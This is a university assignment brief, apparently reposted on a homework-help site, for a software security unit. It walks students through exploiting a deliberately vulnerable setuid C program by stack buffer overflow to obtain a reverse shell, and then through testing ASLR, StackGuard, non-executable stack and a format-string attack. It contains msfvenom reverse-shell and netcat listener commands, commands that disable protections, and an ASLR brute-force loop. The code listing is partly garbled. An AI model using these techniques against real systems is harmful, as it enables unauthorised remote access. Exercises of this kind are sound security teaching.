FIT5003 Software Security Assignment-1 (S2 2024)
Total Marks 100
Due on September 6th, 2024,Friday, 11:55:00 pm
1 Overview
The primary learning objective of this assignment is to provide you with firsthand experience in exploiting buffer overflow vulnerabilities and format string issues. Additionally, it aims to deepen your understanding of how operating system countermeasures function in response to these security challenges. All tasks in this assignment can be done on Ubuntu VM as used in the labs. Please refer to Section 2 for submission notes.
2 Submission
You need to submit a lab report (one single PDF file) to describe what you have done and what you have observed with screenshots whenever necessary. In your report, you need to answer all the questions listed in this manual. Please answer each question using at most 200 words. Typeset your report into .pdf format (make sure it can be opened with Adobe Reader) and name it as the format: [Your Name]-[Student ID]- FIT5003-Assignment.pdf.
All source code, if required, should be embedded in your report. Additionally, if a demonstration video is needed, record your screen demonstration along with a voice explanation and upload the video to your Monash Google Drive or any online service that allows video sharing. Include the shared URL of the video in your report. You can use this free tool to make the video:https://monash-panopto.aarnet.edu.au/ ; other tools, such as Zoom, are also fine.
Important notes and penalties:
• It is the student’s responsibility to ensure that the video content is accessible to the teaching staff. Failure to provide accessible video will result in the relevant task being assessed without consideration of the video.
• A part of the submitted video (at a corner) must clearly show your face at all times. Penalties may apply when that’s not the case.
• Late submissions incur a 5-marks deduction per day. For example, if you submit 2 days and 1 hour late, that incurs 15-marks deduction. Submissions more than 7 days late will receive a zero mark.
• If you require extension or special consideration, refer to https://www.monash.edu/students/ admin/assessments/extensions-special-consideration. No teaching team mem-ber is allowed to give you extension or special consideration, so please do not reach out to a teaching team member about this. Follow the guidelines in the aforementioned link.
• The maximum allowed duration for the recorded video is 15 mins. Therefore, only the first 15:00 mins of your submitted video will be marked. Any exceeding video components will be ignored.
• If your device does not have a camera (or for whatever reason you can’t use your device), you can borrow a device from Monash Connect or Library. It’s your responsibility to plan ahead for this. Monash Connect or Library not having available devices for loan at a particular point in time is not a valid excuse.
• You can create multiple video parts at different times, and combine and submit a single video at the end. Make sure that the final video is clear and understandable.
• If any task requires installing new software, you are allowed to do that in advance of recording your video. You do not need to demonstrate software installation in the video.
• You can do (online) research in advance, take notes and make use of them during your video recording. You may also prepare exploit scripts in advance. But you cannot simply copy-paste commands to carry out the tasks without any explanations. Explanations (of what the code does) while completing the tasks are particularly important.
• During video recording, demonstrations of tasks should be performed live. For example, you cannot exploit a buffer overflow in advance and then simply walk through the results on screen. However, you may prepare the commands beforehand and execute them during the demonstration.
• Zero tolerance on plagiarism and academic integrity violations: If you are found cheating, penalties will apply, e.g., a zero grade for the unit. The demonstration video is also used to detect/avoid plagia-rism. University policies can be found at https://www.monash.edu/students/academic/ policies/academic-integrity.
3 Buffer Overflow Vulnerability [65 Marks]
You will be given a program deliberately containing a buffer-overflow vulnerability. Your objective is to de- vise a strategy to exploit this vulnerability and send a remote access to an attacker. Furthermore, beyond ex- ecuting the attacks, you will be guided through an examination of various protection schemes implemented in the operating system designed to thwart buffer overflow vulnerabilities. Your task involves assessing the efficacy of these countermeasures and providing explanations for their success or failure.
3.1 Initial setup
You can execute the tasks using the Ubuntu VM used in the labs. Ubuntu and other Linux distributions have implemented several security mechanisms to make the buffer-overflow attack difficult. To simplify our attacks, we need to disable them first.
Address Space Randomisation. Ubuntu and several other Linux-based systems uses address space ran- domisation to randomise the starting address of heap and stack. This makes guessing the exact addresses difficult; guessing addresses is one of the critical steps of buffer-overflow attacks. In this part, we disable these features using the following commands:
$ sudo sysctl -w kernel .randomize_va_space=0
The StackGuard Protection Scheme. The GCC compiler implements a security mechanism called “Stack Guard” to prevent buffer overflows. In the presence of this protection, buffer overflow will not work. You can disable this protection if you compile the program using the -fno-stack-protector switch. For example, to compile a program example.c with Stack Guard disabled, you may use the following command:
$ gcc -m32 -fno-stack-protector example .c
Non-Executable Stack. Ubuntu used to allow executable stacks, but this has now changed: the binary images of programs (and shared libraries) must declare whether they require executable stacks or not, i.e., they need to mark a field in the program header. Kernel or dynamic linker uses this marking to decide whether to make the stack of this running program executable or non-executable. This marking is done automatically by the recent versions of gcc, and by default, the stack is set to be non-executable. To change that, use the following option when compiling programs:
For executable stack:
$ gcc -m32 -z execstack -o test test .c
For non-executable stack:
$ gcc -m32 -z noexecstack -o test test .c
3.2 The Vulnerable Program
/ * stack .c */
/ * This program has a buffer overflow vulnerability . */ / * Our task is to exploit this vulnerability */
#include
int bof(char *str,int studentID) {
int bufSize; int a = 12;
int b = 18;
bufSize = 12 + studentID%32; char buffer[bufSize];
strcpy(buffer, str); return 1;
}
int main(int argc, char **argv[]) {
if(argc < 2) {
printf("Usage: %s
}
int studentID = ; //ENTER YOUR STUDENT ID HERE bof(argv[1],studentID);
printf("Returned Properly\n"); return 1;
}
You need to enter your student ID to the variable studentId. Then, compile the above vulnerable program and make it set-root-uid. You can achieve this by compiling it in the root account and chmod the executable to 4755 (don’t forget to include the execstack and -fno-stack-protector options to turn off the non-executable stack and StackGuard protections):
$ su root
Password (enter your password)
# gcc -m32 -g -o stack -z execstack -fno-stack-protector stack .c
# chmod 4755 stack # exit
The above program has a buffer overflow vulnerability. It takes input from the terminal which is under
user’s control.
3.3 Task 1: Exploiting the Vulnerability [35 Marks]
The objective of this task is to exploit buffer overflow vulnerability in the above provided code (stack.c) and receive a reverse-shell. You need to read Appendix A.1 to investigate how to create a reverse-shell code. Then, you also need to study how to simulate an attacker, who is listening at a specific address/port and waiting for the shell. We refer you to Appendix A.2 for this simulation.
You will need to generate a reverse-shell code using msfvenom and create a payload. Then run the vulnerable program stack with your payload. If your exploit is implemented correctly, the attacker should be able to get the reverse shell.
You will be overflowing the buffer in stack .c, which is compiled with the Stack Guard protection disabled.
$ . /stack {PAYLOAD} // launch the attack by running the vulnerable program
If the attacker obtains the shell successfully, her terminal should be as follows (assuming that she is listening at the port 4444, and the program stack is running at the address 10.0.2.15).
$$ nc -lvp 4444 // listening at the port 4444 Listening on [ 0.0.0.0 ] (family 0, port 4444)
Connection from [ 10.0.2.15 ] port 4444 [tcp/ *] accepted
Please note that, ideally, the attack should work outside the debugger. However, making it work inside GDB is also acceptable. The reason it may not work outside GDB is explained here.
Once the attacker obtains the shell, she can remotely manipulate all the current files where the program stack runs.
Q1 (35 marks): Provide your video demonstration evidence to support and verify that you have performed the attack and it worked successfully. You need to embed the vidoe link to your report so that the teaching team can view and verify your works. In the video, you need to demonstrate following key points:
• The buffer overflow happens and the attacker receives the shell when the victim executes the vulnerable program stack. (10 marks if the attack works during your demonstration video)
• Debug the program stack to investigate the return memory address and local variables (high-light them in your video demo) in the function bof(). (15 marks for the debug demonstra-tion and memory analysis)
• Explain clearly the payload used for exploiting the buffer, i.e. how many NOPs were used and why, how the return address was selected etc..(10 marks for your explanation during the demonstration video)
Please note that providing incorrect student ID will result 0 mark for this task. The full marks only given if you have solid explanation with supporting memory address analysis.
3.4 Task 2: Address Randomisation [5 Marks]
Now, we turn on the Ubuntu’s address randomisation. We run the same attack developed in the above task.
Can you get a shell? If not, what is the problem? How does the address randomisation make your attacks difficult? You can use the following instructions to turn on the address randomisation:
$ sudo /sbin/sysctl -w kernel .randomize_va_space=2
If running the vulnerable code once does not get you the root shell, how about running it for many times? You can run . /stack in the following loop , and see what will happen. If your exploit program is designed properly, you should be able to get the root shell after a while. You can modify your exploit program to increase the probability of success (i.e., reduce the time that you have to wait).
$ sh -c "while [ 1 ]; do . /stack {PAYLOAD}; done;"
Q2 (5 marks): Follow the above steps, and answer the highlight questions. You should describe your observation and explanation briefly. Furthermore, try whether you can obtain root shell again. [Marking scheme: 2 marks for the screenshot and 3 marks for the explanation and solutions].
3.5 Task 3: Stack Guard [20 Marks]
Before working on this task, remember to turn off the address randomisation first, or you will not know
which protection helps achieve the protection.
In our previous tasks, we disabled the “Stack Guard” protection mechanism in GCC when compiling the programs. In this task, you may consider repeating the above task in the presence of Stack Guard. To do that, you should compile the program without the -fno-stack-protector’ option. For this task, you will recompile the vulnerable program, stack.c, to use GCC’s Stack Guard, execute the stack program again, and report your observations. You may report any error messages you observe.
In the GCC 4.3.3 and newer versions, Stack Guard is enabled by default. Therefore, you have to disable Stack Guard using the switch mentioned before. In earlier versions, it was disabled by default. If you use an older GCC version, you may not have to disable Stack Guard.
Q3 Follow the above steps, and report your observations. Provide a screenshot of the stack and highlight the stackguard in the screenshot. [Marking scheme: 2 marks for the screenshot and 3 marks for the explanation and solutions] (5 marks)
Assume the stackguard is a static value (Your student ID) XORed with the original Return Address. Example:
22224444 (SID) XOR BFFFFFFB (RA) = 9DDDBBBF (Stack Guard)
Q4 Modify the successful payload from Q1 to bypass the above stackguard. You do not have to demonstrate the attack for this question. Answer the below points.
• Calculate the stackguard for the payload used in Q1. (2 marks)
• Provide the modified payload which can attack a system with the above stackguard protection. Length of the stackguard should be same as what you found in Q3. If the length is longer than the calculated value in the previous step, you may add Fs to the end to match the length. Ex: 9DDDBBBF FFFFFFFF (10 marks)
• Explain how the payload can bypass the stackguard with the above payload. (3 marks)
3.6 Task 4: Non-executable Stack [5 Marks]
Before working on this task, remember to turn off the address randomisation first, or you will not know
which protection helps achieve the protection.
In our previous tasks, we intentionally make stacks executable. In this task, we recompile our vulnerable program using the noexecstack option, and repeat the attack in the above task. Can you get a shell? If not, what is the problem? How does this protection scheme make your attacks difficult. You can use the following instructions to turn on the non-executable stack protection.
# gcc -o stack -fno-stack-protector -z noexecstack stack .c
It should be noted that non-executable stack only makes it impossible to run shellcode on the stack, but it does not prevent buffer-overflow attacks, because there are other ways to run malicious code after exploiting a buffer-overflow vulnerability.
Whether the non-executable stack protection works or not depends on the CPU and the setting of your virtual machine,because this protection depends on the hardware feature that is provided by CPU.
Q5 (5 marks): Follow the above steps, and answer the highlight questions. You should describe your observation and explanation briefly. [Marking scheme: 2 marks for the screenshot and 3 marks for the explanation and solutions]
4 Format String Attack [20 Marks]
For this task you are required to modify the memory using Format String vulnerability in the C program we have provided. This program takes 3 inputs from the user and outputs a secret at the end. Unlike the lab task we did, this program doesn’t print the content of the stack. You will have to use the additional input in this program to look at the stack.
4.1 Task 1: Modifying the memory using Format String vulnerability (20 Marks)
Your goal is to exploit the format string vulnerability in order to change the letters of the secret in the
buffer. This task needs to be performed with address randomization turned on ($ sudo /sbin/sysctl
-w kernel .randomize va space=2). Additionally, the exploitation should be carried out in the terminal; using GDB is not allowed.
If the attack is successful the modified secret should display on the screen. The secret should be modified differently by each student as below. Example:
22224444 mod 27 = 15
You should use the 15th character in the alphabet: O
Q6: You need to upload your demo video to your Monash Google Drive and embed its shared link to your report so that the teaching team can view and verify your works. There are marks allocated for explaining the steps while demonstrating.
1. Find the ASCII value of the character to be changed to using the above mentioned method. Zero marks will be given for the complete question if this calculation is incorrect. (2 Marks).
2. Change the first letter of the secret to the UPPER case letter based on your student ID. Ex: OIT5003 (8 Marks).
3. While the first letter is modified as previous question, now change the fourth letter of the secret to the LOWER case letter based on your student ID. Ex: OITo003 (10 Marks).
Hint: Use an ASCII table online to find out the hexadecimal representation of the letter you want to change to.
Please note that you are not allowed to change the program code by any means. Doing so will result in zero marks for the question.
5 Report Completion and Quality of Presentation [15 Marks]
Please include all payloads, stack.c file and video URLs in the PDF report. Full marks can only be obtained if the report is complete and appropriately formatted. Marks are allocated to the quality and clarity of presentation in the report and the video.
A.1 Reverse Shell Creation
A reverse-shell enables the connection from the target machine to the attacker’s machine. In this situation, the attacker’s machine acts as a server. It opens a communication on a port and waits for incoming connec- tions. The target machine acts as a client connecting to that listener, and then finally the attacker receives the shell. These attacks are dangerous because they give an attacker an interactive shell on the target machine, allowing the attacker to manipulate filesystem/data.
In this assignment, we use msfvenom module in Metasploit to generate the reverse shellcode. Metas- ploit is one of the most powerful and widely used tools for exploring/testing the vulnerability of computer systems or to break into remote systems. You first install Metasploit by openning a terminal and entering the following command. Note that the command is one-line command without line breaks.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/ master/config/templates/metasploit-framework-wrappers/ msfupdate .erb > msfinstall && chmod 755 msfinstall && . /msfinstall |
To see msfvenom help, you can use msfvenom -h . To generate a reverse shell, you can use the following command. You should wait few seconds to obtain the reverse shellcode.
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10 .0 .2 . 15 LPORT=4444 -f c
where -p is a payload type (in this case it’s for 32-bit Linux reverse shell binary), LHOST is your VM’s IP address (assuming you’re the attacker), LPORT is the port where the attacker is listening, and -f is a format (c in this case). Please note that the shellcode cannot contain NULL or spaces, you can remove these bad characters using the -b flag, you can also use encoding (https://www.offensive-
security.com/metasploit-unleashed/msfencode/).
A.2 Netcat Listener
In this assignment, we use Netcat to simulate the attacker’s listener. Fortunately, Netcat is already installed in Ubuntu VM. It’s a versatile tool that has been dubbed the Hackers’ Swiss Army Knife. It’s the most basic feature is to read and write to TCP and UDP ports. Therfore, it enables Netcat can be run as a client or a server. To see Netcat help, you can type nc -h in terminal. If you want to connect to a webserver ( 10.2.2.2) on port 80, you can type
nc -nv 10 .2 .2 .2 80
And if you want your computer to listen on port 80, you can type nc -lvp 80
版权所有:编程辅导网 2021 All Rights Reserved 联系方式:QQ:821613408 微信:horysk8 电子信箱:[email protected]
免责声明:本站部分内容从网络整理而来,只供参考!如有版权问题可联系本站删除。